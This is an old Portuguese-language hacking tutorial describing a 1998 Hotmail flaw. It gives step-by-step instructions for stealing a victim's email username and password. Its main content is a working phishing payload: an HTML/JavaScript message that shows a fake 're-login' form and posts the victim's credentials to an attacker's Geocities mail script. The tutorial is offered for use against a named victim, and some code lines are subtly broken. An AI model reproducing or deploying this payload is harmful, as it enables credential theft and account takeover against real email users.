H O T M A I L
Um grupo chamado Because-we-can descobriu uma falha no sistema de emails gratuitos Miscrosoft Hotmail no dia 28 de Agosto de 1998. Com este bug, uma pessoa mal intencionada pode capturar o username e o password de usuários menos informados. Trata-se de enviar um simples código JavaScript juntamente com o conteúdo da mensagem, o código é ativado assim que a mensagem é vista. Este JavaScript obriga o usuário a novamente fazer seu login e desta forma enviar, via email, seu nome e senha de acesso à pessoa que enviou o código.
Explorando
esta falha.
1) Primeiro registramos uma conta no
Microsoft Hotmail;
2) Depois precisaremos de uma outra
conta de email. Seguindo as instruções dadas pelo grupo que
descobriu a falha, usaremos a Geocities.com, faça uma conta de
homepage gratuita, desta forma você também receberá um
endereço de email (seu username). Em nosso exemplo o username
será ybwc.
3) Abra o bloco de notas e coloque o
código abaixo, logo após salve-o com o nome message.htm. Note
que na linha 17 do bloco de notas haverá o nosso username da
Geocities (hackers), modifique-o para o seu username.
| <html><head></head><body>
<p>"Go where you want today" - Blue Adept</p> <script> function getmess(){ return "<table border=0 cellpadding=5 cellspacing=5 width=508 height=90%>" + "<tr valign=middle>" + "<th colspan=2>" + "<font face=\"Arial, Helvetica\" size=\"5\">" + "We're Sorry, We Cannot<br>Process Your Request" + "</font></th></tr>" + "<tr valign=middle><td align=center>" + "<font face=\"Arial, Helvetica\" size=\"3\">Reason:&nsp;</font>" + "<font face=\"Arial, Helvetica\" size=\"3\" color=\"#ff0000\"><b>Time expired. Please re-login.</b></font><br>" + "<font face=\"Arial, Helvetica\" size=\"2\"><a href=\"http://www.hotmail.com/errormsg.html\">(Get more info regarding error messages here)</a></font>" + "</td></tr>" + "<tr valign=\"middle\"><td align=\"center\">" + "<FORM METHOD=POST ACTION=\"http://www.geocities.com/cgi-bin/homestead/mail.pl?hacker\" target=\"_top\">" + "<INPUT TYPE=\"hidden\" NAME=\"next-url\" VALUE=\"http://www.hotmail.com\">" + "<INPUT TYPE=\"hidden\" NAME=\"subject\" VALUE=\"Hotmail Password\">" + "<table cellpadding=\"0\" cellspacing=\"5\" border=\"0\">" + "<tr><td><font face=\"Arial, Helvetica\" size=\"2\">Login Name:</font><br><input type=\"text\" name=\"login\" size=\"16\" maxlength=\"16\"></td><td><font face=\"Arial, Helvetica\" size=\"2\">Password:</font><br><input type=\"password\" name=\"passwd\" size=\"16\" maxlength=\"16\"> <input type=\"submit\" value=\"Enter\"></td><tr>" + "</table></form></td></tr>" + "<tr valign=middle><th colspan=2 align=center>" + "<font face=\"Arial, Helvetica\" size=\"3\">" + "Return to <a href=\"http://welcome.to/www.hotmail.com\" target=\"_parent\">Hotmail's Homepage</a>." + "</font></th></tr></table>" + "<p><img src=\"http://209.3.112.251/c9698.gif\" width=189 height=16 border=0 alt=\"Copyright 1996-1997\">"; } nomenulinks=top.submenu.document.link.length;
noworklinks=top.work.document.link.lengt;
</script>
|
4) Escreva uma mensagem para a vítima (de acordo com o nosso exemplo a vítima será victim@hotmail.com) e adicione o message.htm. Logo após envie a mensagem.
5) Aguarde até a vítima ler o email enviado e verifique sua conta na Geocities. Você terá recebido uma mensagem contendo endereço ip, username e password da vítima.